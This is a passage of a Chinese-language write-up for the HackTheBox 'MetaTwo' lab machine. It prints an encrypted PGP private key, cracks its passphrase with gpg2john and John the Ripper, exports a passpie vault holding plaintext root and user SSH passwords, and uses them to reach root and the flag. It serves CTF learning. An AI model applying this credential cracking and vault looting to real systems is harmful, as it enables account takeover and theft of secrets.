WIVdy+jynHb81B3FIHT832OVi2hTCT6vhfTILFklLMxvirM6AaEPFhxIuRboiEQw 8lQMVtA1l+Et9FXS1u91h5ZL5PoCfhqpjbFD/VcC5I2MhwL7n50ozVxkW2wGAPfh cODmYrGiXf8dle3z9wg9ltx25XLsVjoR+VLm5Vji85konRVuZ7TKnL5oXVgdaTML qIGqKLQfhHwTdvtYOTtcxW3tIdI16YhezeoUioBWY1QM5z84F92UVz6aRzSDbc/j FJOmNTe7+ShRRAAPu2qQn1xXexGXY2BFqAuhzFpO/dSidv7/UH2+x33XIUX1bPXH FqSg+11VAfq3bgyBC1bXlsOyS2J6xRp31q8wJzUSlidodtNZL6APqwrYNhfcBEuE PnItMPJS2j0DG2V8IAgFnsOgelh9ILU/OfCA4pD4f8QsB3eeUbUt90gmUa8wG7uM FKZv0I+r9CBwjTK3bg/rFOo+DJKkN3hAfkARgU77ptuTJEYsfmho84ZaR3KSpX4L /244aRzuaTW75hrZCJ4RxWxh8vGw0+/kPVDyrDc0XNv6iLIMt6zJGddVfRsFmE3Y q2wOX/RzICWMbdreuQPuF0CkcvvHMeZX99Z3pEzUeuPu42E6JUj9DTYO8QJRDFr+ F2mStGpiqEOOvVmjHxHAduJpIgpcF8z18AosOswa8ryKg3CS2xQGkK84UliwuPUh S8wCQQxveke5/IjbgE6GQOlzhpMUwzih7+15hEJVFdNZnbEC9K/ATYC/kbJSrbQM RfcJUrnjPpDFgF6sXQJuNuPdowc36zjE7oIiD69ixGR5UjhvVy6yFlESuFzrwyeu TDl0UOR6wikHa7tF/pekX317ZcRbWGOVr3BXYiFPTuXYBiX4+VG1fM5j3DCIho20 oFbEfVwnsTP6xxG2sJw48Fd+mKSMtYLDH004SoiSeQ8kTxNJeLxMiU8yaNX8Mwn4 V9fOIdsfks7Bv8uJP/lnKcteZjqgBnXPN6ESGjG1cbVfDsmVacVYL6bD4zn6ZN/n WLQzUGFzc3BpZSAoQXV0by1nZW5lcmF0ZWQgYnkgUGFzc3BpZSkgPHBhc3NwaWVA bG9jYWw+iJAEExEIADgWIQR8Z4anVhvIT1BIZx44d3XDV0XSAwUCYrhX1gIbIwUL CQgHAgYVCgkICwIEFgIDAQIeAQIXgAAKCRA4d3XDV0XSA0RUAP91ekt2ndlvXNX6 utvl+03LgmilpA5OHqmpRWd24UhVSAD+KiO8l4wV2VOPkXfoGSqe+1DRXanAsoRp dRqQCcshEQ25AQ0EYrhX1hAEAIQaf8Vj0R+p/jy18CX9Di/Jlxgum4doFHkTtpqR ZBSuM1xOUhNM58J/SQgXGMthHj3ebng2AvYjdx+wWJYQFGkb5VO+99gmOk28NY25 hhS8iMUu4xycHd3V0/j8q08RfqHUOmkhIU+CWawpORH+/+2hjB+FHF7olq4EzxYg 6L4nAAMFA/4ukPrKvhWaZT2pJGlju4QQvDXQlrASiEHD6maMqBGO5tJqbkp+DJtM F9UoDa53FBRFEeqclY6kQUxnzz48C5WsOc31fq+6vj/40w9PbrGGBYJaiY/zouO1 FU9d04WCssSi9J5/BiYiRwFqhMRXqvHg9tqUyKLnsq8mwn0Scc5SVYh4BBgRCAAg FiEEfGeGp1YbyE9QSGceOHd1w1dF0gMFAmK4V9YCGwwACgkQOHd1w1dF0gOm5gD9 GUQfB+Jx/Fb7TARELr4XFObYZq7mq/NUEC+Po3KGdNgA/04lhPjdN3wrzjU3qmrL fo6KI+w2uXLaw+bIT1XZurDN =dqsF -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP PRIVATE KEY BLOCK----- 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 =7Uo6 -----END PGP PRIVATE KEY BLOCK-----
保存私钥到文件key,并转换为john hash格式:
1 2 3 4 5 6 7 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─ File key ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─ Passpie:$gpg$*17*54*3072*e975911867862609115f302a3d0196aec0c2ebf79a84c0303056df921c965e589f82d7dd71099ed9749408d5ad17a4421006d89b49c0*3*254*2*7*16*21d36a3443b38bad35df0f0e2c77f6b9*65011712*907cb55ccb37aaad:::Passpie (Auto-generated by Passpie) <passpie@local >::key
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash
1 Crash recovery file is locked: /root/.john/john.rec
解决方法:
开始爆破:
1 2 3 4 5 6 7 8 9 10 11 12 13 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─ Using default input encoding: UTF-8 Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) Cost 1 (s2k-count) is 65011712 for all loaded hashes Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status blink182 (Passpie) 1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november Use the "--show" option to display all of the cracked passwords reliably Session completed.
爆破出密码blink182
利用爆破出的密码,导出passpie密码库:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 jnelson@meta2:~$ passpie export passwd Passphrase: jnelson@meta2:~$ ls passwd user.txt jnelson@meta2:~$ cat passwd credentials: - comment: '' fullname: root@ssh login: root modified: 2022-06-26 08:58:15.621572 name: ssh password: !!python/unicode 'p7qfAZt4_A1xo_0x' - comment: '' fullname: jnelson@ssh login: jnelson modified: 2022-06-26 08:58:15.514422 name: ssh password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys' handler: passpie version: 1.0
使用root密码p7qfAZt4_A1xo_0x 登陆获得root_flag.
1 2 3 4 jnelson@meta2:~$ su root Password: root@meta2:/home/jnelson e0a4f8aac97646de58a612e9825392dd
注意事项 对于已经爆破成功的文件:第二次只用show参数即可,不需要重复多次爆破。
1 2 3 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# john --show user.hash manager:partylikearockstar
参考 https://github.com/evyatar9/Writeups/tree/master/HackTheBox/MetaTwo
https://medium.com/@KonradDaWo/hackthebox-metatwo-writeup-59135896c890
https://7rocky.github.io/en/htb/metatwo/
https://enterprise.hackthebox.com/machine/605/19206/writeup
